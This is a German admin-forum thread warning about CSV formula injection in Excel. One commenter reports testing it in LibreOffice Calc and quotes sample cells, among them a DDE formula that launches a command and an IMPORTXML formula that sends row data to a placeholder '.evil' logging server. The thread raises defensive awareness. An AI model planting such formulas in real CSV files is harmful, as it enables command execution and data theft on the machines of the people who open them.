3
CSV-Import in Excel mit Code-Injection!
http://georgemauer.net/2017/10/07/csv-injection.html
Nur damit niemand denkt, da kann ja nicht viel passieren.
Auch bei CSV-Dateien, sollte man genau hinsehen, wo die Datei herkommt und ob sie "sauber" ist.
lks
Nur damit niemand denkt, da kann ja nicht viel passieren.
Auch bei CSV-Dateien, sollte man genau hinsehen, wo die Datei herkommt und ob sie "sauber" ist.
lks
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 351284
Url: https://administrator.de/contentid/351284
Printed on: April 16, 2024 at 11:04 o'clock
3 Comments
Latest comment
Interessant!
Ich muss gestehen, da habe ich mir bis Dato noch nie so wirklich Gedanken zu gemacht. Vermutlich aber auch, weil wir/ ich das Gros der csv-Dateien nicht zum Öffnen in Excel nutzen, sondern (mit einer anderen Endung) als Export des Systems A und dann als Import des Systems B nutzen....
Gruß
em-pie
Ich muss gestehen, da habe ich mir bis Dato noch nie so wirklich Gedanken zu gemacht. Vermutlich aber auch, weil wir/ ich das Gros der csv-Dateien nicht zum Öffnen in Excel nutzen, sondern (mit einer anderen Endung) als Export des Systems A und dann als Import des Systems B nutzen....
Gruß
em-pie
Oha, da stimme ich @em-pie vollkommen zu.
Bezugnehmend zu dessen Kommentar, also CSV-Dateien am besten mit dem Notepad oder einem vergleichbaren Editor öffnen. Muss ich jetzt mal nachprüfen, ob dies auch unter LibreOffice / OpenOffice Calc genauso funktioniert.
Wobei ich mal davon ausgehe. Ich werde berichten.
@Lochkartenstanzer
Danke für den Hinweis.
Gruss Penny
Bezugnehmend zu dessen Kommentar, also CSV-Dateien am besten mit dem Notepad oder einem vergleichbaren Editor öffnen. Muss ich jetzt mal nachprüfen, ob dies auch unter LibreOffice / OpenOffice Calc genauso funktioniert.
Wobei ich mal davon ausgehe. Ich werde berichten.
@Lochkartenstanzer
Danke für den Hinweis.
Gruss Penny
Hallo zusammen,
mein erster Test mit LibreOffice Calc v5.2.7.2 als Anwender gestartet, zeigt mir, daß die Zeile berechnet wird. Soweit, so gut.
Die anderen Zeilen wie folgend aufgeführt
erzeugen jeweils einen Fehlercode.
Soweit zumindest mein erster schneller Test.
mein erster Test mit LibreOffice Calc v5.2.7.2 als Anwender gestartet, zeigt mir, daß die Zeile
2,2017-07-25,Important Client,"=2+5", 240 Die anderen Zeilen wie folgend aufgeführt
2,2017-07-25,Important Client,"=2+5+cmd|' /C calc'!A0", 240
2,2017-07-25,Important Client,"=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")",240 Soweit zumindest mein erster schneller Test.